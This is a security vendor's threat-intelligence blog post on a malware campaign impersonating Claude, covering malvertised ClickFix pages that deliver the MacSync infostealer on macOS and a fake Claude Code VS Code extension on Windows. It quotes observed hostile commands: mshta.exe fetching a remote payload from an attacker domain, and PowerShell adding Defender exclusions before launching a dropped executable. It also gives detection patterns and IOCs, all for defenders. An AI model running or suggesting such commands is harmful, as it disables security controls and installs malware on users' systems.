TL;DR
We’re calling it Claude Fraud. A sophisticated, multi-variant malware campaign actively targeting developers and security professionals who use AI coding tools — exploiting the trusted Claude.ai brand to deliver infostealer malware via Google Sponsored search results, fake landing pages, legitimate AI platforms, and trojanized VS Code extensions. Two confirmed attack vectors. Thousands of victims documented publicly. More in the wild.
What makes Claude Fraud notable is not just the technical execution — it is the target profile and the deliberate exploitation of trust. The victims are technically sophisticated people: software engineers, security practitioners, AI-tool power users. Newer Claude Code adopters are equally at risk — curiosity about AI tools and the pressure to adopt quickly can be just as effective as technical familiarity at lowering a user's guard. The attackers engineered something that, by design, does not look suspicious to that audience.
7AI’s AI SOC agents identified three cases tied to this campaign in monitored environments — one macOS incident involving a Google-ad-served fake download, and two Windows incidents at a large technology company involving a malicious VS Code extension masquerading as a Claude Code plugin. Combined with public research from Moonlock Lab and AdGuard documenting over 15,600 victims, Claude Fraud has reached significant scale.
This post documents the technical mechanics of both attack vectors, shares anonymized investigation findings from real-world detections, and provides actionable detection and defensive guidance for security teams.
STAY AHEAD OF EMERGING THREATSGet the latest threat intelligence, research insights, and vulnerability analysis directly from the 7AI Threat Research Team.
|
The past 18 months have seen explosive adoption of AI coding tools. Claude Code, GitHub Copilot, Cursor, and similar tools are now standard in developer environments at enterprises of every size. Security teams use them too — for scripting, automation, and investigation workflows. This adoption has created a new and underexplored attack surface — one the Claude Fraud operators were quick to recognize. So do newer Claude Code adopters: individuals who may be less familiar with the ecosystem but are equally likely to follow a sponsored link to what appears to be official documentation.
AI developer tools share several properties that make them attractive as a delivery mechanism for threat actors:
Claude Fraud exploits all of these properties simultaneously across two distinct delivery vectors.
A developer, security professional, or someone newly exploring Claude Code opens a browser and searches for a routine technical term — "online DNS resolver," "HomeBrew," or "macOS CLI disk space analyzer." At the top of the results, they see a sponsored link. The ad leads to what appears to be a technical documentation page.
This attack has appeared in two sub-variants, both observed in the wild:
|
Sub-variant A: Legitimate claude.ai Artifact (documented, historical) The sponsored link leads to a real claude.ai domain — specifically a legitimate public Claude.ai artifact: user-generated content hosted on Anthropic’s own infrastructure. The artifact is titled something like “macOS Secure Command Execution” and presents itself as a technical guide. This is not a typosquatted domain or phishing clone. It is the real claude.ai domain. The attackers leveraged Anthropic’s own platform to host malicious content. Moonlock Lab documented this variant being accessed over 15,600 times before it was taken down. |
|
Sub-variant B: Squarespace-hosted Fake Page (currently active in the wild) The currently active and most widely observed variant hosts the malicious content on a Squarespace domain rather than claude.ai. The page mimics the visual style of legitimate Claude developer documentation — polished layout, technically fluent English, and a plausible tool name. To a developer who has seen the real Claude interface, the page reads as credible. Screenshots below show this variant as it appears at time of publication. |
In both sub-variants, the core attack mechanic is identical. The page instructs the reader to paste a command into their macOS Terminal to “install” or “fix” something routine. If they do, they are compromised.
The Terminal command passed a base64-encoded string to bash, which decoded and executed a shell script. That script downloaded a loader for the MacSync infostealer — an information-stealing malware family targeting macOS systems.
Once executed, MacSync:
The malware included sophisticated retry mechanics, suggesting it was designed to reliably complete exfiltration even on intermittent connections.
Both sub-variants exploit a specific gap in how users evaluate sponsored search results, but they do so through slightly different mechanisms:
In Sub-variant A (claude.ai artifact): the URL visible in the ad is real. Claude.ai is a recognized, trusted domain. Most users — even security-aware ones — do not scrutinize the specific artifact URL within a trusted domain. The content mirrors legitimate technical documentation in both style and substance.
In Sub-variant B (Squarespace-hosted fake page): the page is a convincing replica of Claude developer documentation, hosted on a Squarespace domain that does not immediately signal "phishing" to a technically literate user. The professional visual design, technically accurate language, and routine-seeming task (pasting a terminal command) all lower suspicion.
In both cases, the attackers leveraged compromised advertising accounts belonging to legitimate organizations — a Canadian children’s charity and a Colombian retailer — to run the sponsored placements. This gave the ads passing grades on Google’s advertiser verification checks, making removal more difficult and delayed.
Both variants represent a ClickFix attack — a social engineering technique that prompts the user to copy and execute a Terminal command to “fix” a problem or complete an installation. It works because the execution step feels like a normal developer action, not a suspicious one.
|
Key Insight: Why Claude Fraud Works Across Both Variants This attack succeeds against technically sophisticated users and curious newcomers alike — not just general users.
Sub-variant A exploits brand impersonation at the infrastructure level — the URL is real, but the content is malicious. |
The second Claude Fraud vector is more sophisticated and stealthier than the initial download-based attack. Rather than relying on user action to trigger a download, it weaponizes a VS Code extension capable of executing commands programmatically in the background while the user continues normal development activity.
7AI identified two confirmed true-positive incidents within a large technology environment. Both incidents exhibited the identical initial behavior: VS Code spawning PowerShell, which then performed clearly malicious actions. The events occurred on different machines under different user accounts, which makes individual user error unlikely and strongly suggests a shared distribution vector.
The first incident was detected at approximately 09:31-09:33 UTC. CrowdStrike Falcon raised a high-severity alert for LOLBIN (Living Off the Land Binary) abuse on a Windows workstation.
The process chain captured in telemetry:
Code.exe (VS Code)
└── powershell.exe
└── C:\Windows\SysWOW64\mshta.exe https://claude-code.official-version[.]com/claude
The mshta.exe binary is a legitimate Windows component known as the Microsoft HTML Application Host. When invoked with a remote URL, it retrieves and executes an HTA (HTML Application) payload directly in memory. This technique is widely abused because it allows attackers to execute remote code without writing a file to disk, making detection more difficult.
In this case, the 32-bit version of mshta.exe (SysWOW64) was used on a 64-bit system. This approach is sometimes employed to bypass security instrumentation that monitors only the 64-bit process space. PowerShell served as an intermediate layer between VS Code and mshta.exe, creating an indirect execution chain. This indirection can bypass detection rules that focus on direct parent-child relationships between development tools and known LOLBIN utilities.
Telemetry showed multiple mshta.exe executions within a two-minute window, indicating that the spawning process retried repeatedly when earlier executions were terminated by endpoint protection controls.
The C2 domain — claude-code.official-version[.]com — contacted by mshta.exe had been registered approximately one day prior to the attack, a timeline consistent with short-lived infrastructure used in targeted developer-focused campaigns.
A second incident occurred later the same day on a different host. The initial execution pattern was identical: VS Code spawning PowerShell. However, the second stage behavior differed.
The PowerShell command executed by the extension:
Add-MpPreference -ExclusionPath "C:\Users\[user]\Development\..."
Add-MpPreference -ExclusionPath "C:\temp"
Start-Sleep -Seconds 2
cmd /c "C:\temp\CrossMark2-Setup.exe"
This command chain performs three actions in rapid succession:
These exclusions modify Defender’s registry configuration and remain active until manually removed, allowing any payload placed in those directories to execute without antivirus scanning.
The executable name used in the command mimics a legitimate benchmarking tool commonly used in performance testing environments. The choice of name is notable because it blends naturally into developer workflows and hardware validation environments, reducing suspicion during incident review.
The Defender exclusions added via Add-MpPreference persist in the Windows registry until explicitly removed: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\temp. Any payload dropped to excluded directories remains invisible to Defender indefinitely unless the exclusions are explicitly cleaned up. The timing between applying the exclusions and launching the executable was measured in seconds, a pattern strongly indicative of automated execution rather than a human manually running commands in sequence.
Despite differing second-stage payloads, both incidents share several critical characteristics:
The available telemetry alone could not conclusively prove the initial delivery mechanism. However, after discussing the true positives with the environment’s SOC team, users reported using blog posts that guided them through the installation process.
The hypothesis consistent with all available evidence is that a malicious VS Code extension masquerading as an official "Claude Code" plugin was installed by both users. The extension is executed silently through VS Code’s extension API, which allows extensions to spawn child processes without user interaction or a visible terminal window. Different second-stage payloads may reflect a staggered delivery system or targeted customization based on host profiling during the initial beacon.
|
Detection Note VS Code extensions run inside Code.exe’s Node.js runtime and can spawn child processes via child_process.exec() or child_process.spawn() without any user interaction or visible terminal activity. Because extensions execute within the editor’s background runtime, malicious commands may run even when no integrated terminal is open. EDR tools that look only for direct Code.exe-to-powershell.exe parent-child relationships may miss this execution chain if the extension launches commands through the Node.js runtime. Detection should focus on the full process lineage: Code.exe -> powershell.exe -> [LOLBIN execution or security control modification]. |
|
Attribute |
Vector 1: Malvertising + ClickFix Installer |
Vector 2: Malicious VS Code Extension |
|---|---|---|
|
Target OS |
macOS |
Windows |
|
Initial access vector |
Google sponsored search result leading to a fake or impersonated installation guide |
Installation of a malicious VS Code extension masquerading as a developer tool |
|
User action required |
User pastes a Terminal command suggested by the guide |
One-time extension installation; execution afterwards is automatic |
|
Delivery mechanism |
Malvertising campaign directing users to documentation-style pages |
Extension distribution through developer tooling ecosystem |
|
Trust anchor exploited |
Claude / Anthropic brand + developer habit of copying Terminal commands from technical blogs |
Claude Code brand impersonation within a trusted development environment |
|
Execution model |
User-initiated command execution in Terminal |
Extension executes commands programmatically via the VS Code runtime |
|
Primary payload behavior |
Downloads a loader for the MacSync infostealer |
Executes system commands via PowerShell (LOLBIN download or security control modification) |
|
Command chain observed |
Terminal → bash/zsh → decoded shell script → malware loader |
Code.exe → powershell.exe → mshta.exe or Defender modification |
|
C2 infrastructure |
a2abotnet[.]com/dynamic |
claude-code.official-version[.]com/claude |
|
Security control evasion |
Social engineering + legitimate-looking infrastructure |
LOLBIN abuse (mshta.exe), PowerShell execution, Defender exclusion |
|
Execution visibility |
User visibly runs the command |
Silent execution — no terminal window, no user prompt |
|
Persistence mechanism |
None observed (single execution) |
Extension re-triggers whenever VS Code launches |
|
Detection opportunities |
Suspicious Terminal commands, outbound connections to malware infrastructure |
Process lineage anomaly: Code.exe → powershell.exe → LOLBIN |
|
Detection difficulty |
Moderate — requires user interaction and visible command execution |
High — automated execution within trusted developer tooling |
For both attack vectors, 7AI’s AI SOC agents identified Claude Fraud activity as true positives using the same underlying investigative approach: correlating the process chain, behavioral context, and infrastructure signals into a coherent attack narrative. This type of multi-signal reasoning is difficult for traditional rules-based detection systems, which typically evaluate each signal in isolation.
An alert fired on endpoint activity consistent with unusual process behavior following a browser interaction. The investigation correlated the process tree, the network call, and the domain reputation — a newly registered domain with zero prior organizational prevalence — into a high-confidence true positive determination. The alert was escalated and confirmed.
The investigation context: the affected user had been browsing and encountered a sponsored search result. The command they executed appeared syntactically similar to a legitimate tool installation. The AI agents were able to draw the connection between the browser activity, the terminal command, and the outbound connection to an unfamiliar domain.
Representation of the Claude Fraud investigation summary in 7AI.
Both Windows incidents were detected from CrowdStrike Falcon alerts ingested into the 7AI platform. What made the investigation particularly meaningful was what happened in the short window between alert ingestion and true positive determination: the AI SOC agents reconstructed the execution chain and correlated it with infrastructure and behavioral signals to determine that both events represented the same attack pattern.
The first incident (LOLBIN via mshta.exe) was ingested at 09:41 UTC. A 7AI investigation was created at 17:12 UTC and concluded TRUE_POSITIVE with escalation at 17:37 UTC — a 25-minute investigation window.
The second incident (Defender exclusion + payload) was ingested at 15:24 UTC. Investigation created at 17:11 UTC, concluded TRUE_POSITIVE at 17:18 UTC — a 7-minute investigation.
In both cases, the AI agents identified and documented the key evidence that would otherwise require a human analyst to gather across multiple tools: the process chain, the PowerShell command line, the security control modifications, the domain registration timing, and the cross-host correlation linking both incidents.
Juliana Testa, from 7AI’s AI security team, noted:
“AI coding assistants are rapidly changing the behavioral baseline of developer environments. Editors now routinely spawn shells, execute scripts, and interact with external services at machine speed. That blurs many of the signals defenders once relied on — timing anomalies, command execution from development tools, or bursts of outbound connections. In many cases even the user cannot reliably confirm whether an action was intentional, because commands may originate from AI-generated suggestions or automated tasks. 7AI addresses this shift by correlating behavior across processes, infrastructure, and user activity rather than relying on isolated indicators.”
The escalation output in both cases also included an evidence-gap analysis: specific investigative steps for responders, such as retrieving the VS Code extension inventory, hashing suspicious binaries, and reviewing network telemetry. Rather than delivering a raw alert, the investigation produced a structured action plan for the responding analyst.
|
Tactic |
Technique |
ID |
|---|---|---|
|
Resource Development |
Acquire Infrastructure: Domains |
T1583.001 |
|
Initial Access |
Drive-by Compromise |
T1189 |
|
Execution |
User Execution: Malicious Link |
T1204.001 |
|
Execution |
Command and Scripting Interpreter: Unix Shell |
T1059.004 |
|
Defense Evasion |
Masquerading (fake installation documentation / brand impersonation) |
T1036 |
|
Collection |
Data from Local System |
T1005 |
|
Command and Control |
Exfiltration Over C2 Channel |
T1041 |
Vector 2 (Windows / VS Code Extension)
|
Tactic |
Technique |
ID |
|---|---|---|
|
Resource Development |
Acquire Infrastructure: Domains |
T1583.001 |
|
Initial Access |
Supply Chain Compromise (malicious developer extension) |
T1195 |
|
Execution |
Command and Scripting Interpreter: PowerShell |
T1059.001 |
|
Execution |
Command and Scripting Interpreter: Windows Command Shell |
T1059.003 |
|
Execution / Defense Evasion |
System Binary Proxy Execution: Mshta |
T1218.005 |
|
Defense Evasion |
Disable or Modify Security Tools |
T1562.001 |
|
Defense Evasion |
Masquerading (benchmark installer / extension impersonation) |
T1036 |
|
Command and Control |
Ingress Tool Transfer |
T1105 |
|
Discovery |
System Network Configuration Discovery |
T1016 |
|
Discovery |
Query Registry |
T1012 |
|
Note on IOCs The following indicators are derived from active Claude Fraud investigations and publicly documented research. The C2 domain official-version[.]com may host additional subdomains beyond claude-code, and defenders should assume related infrastructure may exist under the same parent domain. Organizations should implement wildcard blocks on *.official-version[.]com and query DNS logs broadly for historical resolution of this domain and its subdomains. Brackets have been added to domain names to prevent accidental resolution. |
|
IOC / Indicator |
Type |
Value / Pattern |
Recommended Action |
|---|---|---|---|
|
MacSync C2 Domain |
Malicious Domain |
a2abotnet[.]com/dynamic |
Block at DNS and firewall |
|
MacSync C2 Domain |
Malicious Domain |
a2abotnet[.]com/gate |
Block at DNS and firewall |
|
VS Code Extension C2 |
Malicious Domain |
claude-code.official-version[.]com |
Block at DNS/firewall; implement wildcard block |
|
VS Code Extension C2 URL |
Malicious URL |
Block at web proxy / URL filtering |
|
|
Parent Infrastructure |
Suspicious Domain |
*.official-version[.]com |
Implement wildcard DNS block; query historical DNS logs for all subdomains |
|
mshta.exe LOLBIN Abuse |
Behavioral – Process Chain |
Code.exe → powershell.exe → mshta.exe with remote URL |
Alert/block; perform fleet-wide threat hunt for this process chain |
|
Defender Exclusion Abuse |
Behavioral – PowerShell |
Add-MpPreference -ExclusionPath C:\temp |
Alert on Defender exclusion changes; flag Add-MpPreference when parent is Code.exe or powershell.exe spawned from developer tools |
|
Malicious File |
File Path / Name |
C:\temp\CrossMark2-Setup.exe (suspected trojanized binary) |
Retrieve SHA256 hash; submit to VirusTotal; quarantine file |
|
Defender Registry Artifact |
Registry Key |
HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\temp |
Remove exclusion; verify registry cleanup |
|
MacSync Staging Archive |
File Artifact |
/tmp/osalogging.zip |
Hunt across endpoints; remove if found |
|
osascript Execution |
Behavioral – macOS |
osascript spawned following curl / base64 decode chain |
Alert on osascript execution following encoded shell activity |
The following behavioral patterns are high-fidelity detection signals:
Windows - LOLBIN via VS Code Extension:
process.parent.name = 'powershell.exe'
process.grandparent.name = 'Code.exe'
process.name = 'mshta.exe'
process.command_line CONTAINS 'http'
Windows - Defender Exclusion from VS Code:
process.parent.name = 'Code.exe'
process.name = 'powershell.exe'
process.command_line CONTAINS 'Add-MpPreference'
process.command_line CONTAINS 'ExclusionPath'
macOS - ClickFix Terminal Execution Pattern:
process.name = 'bash' OR 'zsh'
process.command_line MATCHES '\|.*base64.*-d.*\|.*bash'
process.parent.name = 'Terminal' OR 'iTerm2'
If you use AI coding tools, here are three habits that would have prevented both attack vectors documented here:
Claude Fraud is not an isolated incident. It represents the maturing of a threat category: using the credibility of legitimate platforms — or convincing replicas of them — to defeat the first-line defenses that users have been trained to rely on.
For years, security awareness training has taught users to check the URL, look for HTTPS, and avoid unknown sites. Claude Fraud sidesteps all of that. In the claude.ai artifact variant, the URL is legitimate. In the Squarespace-hosted variant, the page is polished enough that it passes a visual inspection. In both cases, the content is the weapon, not the domain.
We have seen this across multiple platforms: GitHub Pages hosting phishing content, Google Sites serving fake Chrome installers, Medium articles impersonating Apple Support, and now Claude.ai artifacts and VS Code extensions targeting the developer and security community specifically. The quick pivot from claude.ai artifacts to Squarespace-hosted pages demonstrates how adaptable these campaigns are — when one delivery mechanism is taken down, operators stand up another within the same ad campaign.
The common thread is that open-content platforms — where anyone can publish under a trusted domain — are structurally vulnerable to this technique. For security practitioners, the implication is that domain reputation and HTTPS are now necessary but insufficient trust signals. The question to ask is not “is this a real domain?” but “who placed this specific content here, and why?”
The developer community is one of the primary targets of Claude Fraud. The people most likely to download Claude Code, use VS Code extensions for AI-assisted workflows, and search for developer tools in a browser are exactly the people being targeted.
7AI’s response to this — detecting Claude Fraud activity through AI-driven investigation, correlating multiple signals across alerts and hosts, and surfacing an actionable forensic roadmap for response teams — is the kind of work that matters when the volume and sophistication of attacks outpaces what any human team can manually triage.
Claude Fraud is active, it is spreading, and the security community deserves a clear account of what it looks like from the inside of a real investigation.
Block the domains. Audit the extensions. Hunt the process chains. And be skeptical of the next terminal command a webpage asks you to paste.
This research is based on Claude Fraud investigations conducted by the 7AI threat research and security operations team, incorporating findings from active customer detections and public research from Moonlock Lab, AdGuard, and the broader security community. All customer and organizational identifiers have been anonymized. The research team thanks the security community members who shared early observations of this campaign publicly.
Moonlock Lab / HackRead: "Google Ads and Claude AI Abused to Spread MacSync Malware via ClickFix" — February 2026
AdGuard: "Claude-linked Google ads dupe macOS users into installing malware" — February 2026
BleepingComputer: "Claude LLM artifacts abused to push Mac infostealers in ClickFix attack" — February 2026
MITRE ATT&CK Framework: T1218.005 (Mshta), T1562.001 (Disable or Modify Tools), T1583.001 (Acquire Infrastructure: Domains)
Claude Fraud is an active malware campaign that exploits the Claude.ai brand to deliver infostealer malware to developers and security professionals. It operates via two confirmed attack vectors: Google-sponsored ads leading to fake Claude documentation pages on macOS (delivering the MacSync infostealer via a ClickFix terminal command), and a trojanized VS Code extension masquerading as an official Claude Code plugin on Windows (executing PowerShell silently to modify Defender and download payloads).
On Windows, hunt for the process chain Code.exe → powershell.exe → mshta.exe with a remote URL argument across developer workstations. Also hunt for Add-MpPreference -ExclusionPath commands where the parent process is Code.exe. On macOS, look for osascript processes spawned after curl or base64 decode activity, and check /tmp for osalogging.zip. Block a2abotnet[.]com and *.official-version[.]com at your DNS resolver immediately.
The macOS vector delivers MacSync, an infostealer that targets macOS Keychain credentials, browser-stored login data and session cookies, and cryptocurrency wallet private keys. It exfiltrates data as a ZIP archive to attacker infrastructure and deletes staging files after successful upload. The Windows vector executes PowerShell that adds Windows Defender exclusions and launches a secondary executable — with different second-stage payloads observed across incidents, suggesting staggered or targeted delivery.
Public research from Moonlock Lab and AdGuard has documented over 15,600 victims from the original claude.ai artifact variant alone. The campaign is ongoing — after the claude.ai artifacts were taken down, operators immediately shifted to Squarespace-hosted fake pages within the same ad campaign, indicating active maintenance. 7AI identified three confirmed true-positive incidents in monitored environments: one macOS case and two Windows cases at a large technology company.
7AI's AI SOC agents detect Claude Fraud by correlating the full process chain, behavioral context, and infrastructure signals into a coherent attack narrative — including newly registered domains with zero prior organizational prevalence, LOLBIN abuse patterns, and cross-host correlation linking separate incidents to the same campaign. In the documented Windows incidents, 7AI completed investigations in 7–25 minutes from alert ingestion. This type of multi-signal reasoning across processes, infrastructure, and user activity is what distinguishes AI-driven investigation from traditional rules-based detection, which typically evaluates each signal in isolation.
Yes. The Squarespace-hosted variant (Vector 1, Sub-variant B) was active at time of publication. The rapid shift from claude.ai artifacts to Squarespace-hosted pages after takedown demonstrates that the campaign operators are actively maintaining and adapting their infrastructure. Organizations should treat the IOCs in this report as live and implement the detection and blocking recommendations immediately.